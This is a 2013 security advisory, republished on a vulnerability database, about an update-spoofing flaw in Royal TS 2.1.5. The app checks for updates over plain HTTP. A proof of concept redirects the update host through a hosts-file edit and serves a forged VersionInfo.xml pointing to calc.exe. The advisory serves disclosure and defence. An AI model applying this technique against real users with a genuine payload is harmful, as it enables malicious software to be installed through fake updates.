Vulners
Lucene search
Royal TS 2.1.5 Update Spoofing Vulnerability
Update Spoofing Vulnerability in Royal TS 2.1.5
===============================================================================
Author: Janek Vind "waraxe"
Date: 29. March 2013
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-101.html
Description of vulnerable software:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Royal TS is a simple, yet powerful tool for administrators, developers,
system engineers and many other IT focused information workers that supports
them in working effortless with their remote systems or management consoles.
http://www.royalts.com/main/home/win.aspx
Vulnerable is version 2.1.5, other versions not tested.
###############################################################################
1. Update Spoofing Vulnerability
###############################################################################
Current version of Royal TS contains security vulnerability in update mechanism,
which can be exploited by malicious people to conduct spoofing attacks.
When checking for updates, Royal TS issues GET request over HTTP:
GET /dl/RoyalTS/VersionInfo.xml?r=9:54:35%20PM HTTP/1.1
Cache-Control: no-cache
Host: www.royalts.com
Connection: Keep-Alive
Server response:
HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Fri, 16 Nov 2012 11:13:01 GMT
Accept-Ranges: bytes
ETag: "d11e6057ebc3cd1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Thu, 28 Mar 2013 19:54:39 GMT
Content-Length: 13375
<?xml version="1.0" encoding="utf-8"?>
<RoyalVersionInfo xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<Major>2</Major>
<Minor>1</Minor>
<Build>5</Build>
<MinorRevision>61116</MinorRevision>
<DownloadURL>http://www.royalts.com/dl/RoyalTS/RoyalTSInstaller_2.01.05.61116.msi</DownloadURL>
<ReleaseNotes>
<html lang="en" xmlns="http://www.w3.org/1999/xhtml">< ...
</ReleaseNotes>
</RoyalVersionInfo>
Royal TS user can click "Start Download" button and Royal TS
will open web browser with download starting dialog.
Such update mechanism contains security flaw:
Update check is done over unencrypted HTTP channel. Malicious third party
is able to conduct Man-in-the-Middle (MitM) attacks and spoof server response.
In this way it is possible to instruct user to download malicious update.
Testing: tests were done using Windows 7 and Apache webserver. Steps:
1. modify "windows/system32/drivers/etc/hosts" file in order to emulate
DNS spoofing: 127.0.0.1 www.royalts.com
2. create xml file "/dl/RoyalTS/VersionInfo.xml" to the webserver directory
with following content:
<?xml version="1.0" encoding="utf-8"?>
<RoyalVersionInfo xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<Major>2</Major>
<Minor>3</Minor>
<Build>4</Build>
<MinorRevision>61116</MinorRevision>
<DownloadURL>http://localhost/calc.exe</DownloadURL>
<ReleaseNotes>
New version 2.3.4 available!
</ReleaseNotes>
</RoyalVersionInfo>
3. Place "calc.exe" file to the webserver main directory.
4. Open Royal TS, it will check for updates automatically, resulting in dialog:
New version 2.3.4 available!
5. Press "Start Download" button. Default web browser window will be open
offering file download:
"You have chosen to open calc.exe"
# 0day.today [2018-01-09] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
02 Apr 2013 00:00Current
7High risk
Vulners AI Score7